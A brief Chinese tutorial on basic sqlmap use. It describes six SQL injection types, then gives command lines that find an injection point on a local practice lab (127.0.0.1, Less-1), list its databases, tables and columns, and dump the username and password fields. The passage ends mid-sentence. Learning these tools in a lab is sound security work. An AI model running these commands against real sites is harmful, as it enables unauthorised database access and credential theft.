Sqlmap的基本使用

一，sqlmap支持的六种注入方式

1，基于布尔的盲注

通过返回页面判断条件真假的注入

2，基于时间的盲注

不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加来判断）

3，基于报错注入

页面会返回报错信息，或者直接把注入的语句直接返回在页面中

4，联合查询注入

使用union情况下的注入

5，堆查询注入

可以同时执行多条语句的执行时的注入

6，内联查询注入

在sql语句中执行sql语句

二，sqlmap的基本使用

1，检查是否存在注入点

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1"

2，查看所有数据库

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs

 

3，查看当前使用的数据库

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db

4，查看表名

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables 

-D指定数据库，--tables列出表名

 5，列出表中所有字段名

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns

-D指定数据库，-T指定表名，-columns列出所有字段

 6，列出字段内容（数据）

python sqlmap.py  -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C username,password --dump

-D指定数据库，-T指定数据表，-C指定要列出的字段，--dump列出字段内容，转存数据

 根据提示内容找到转存的数据：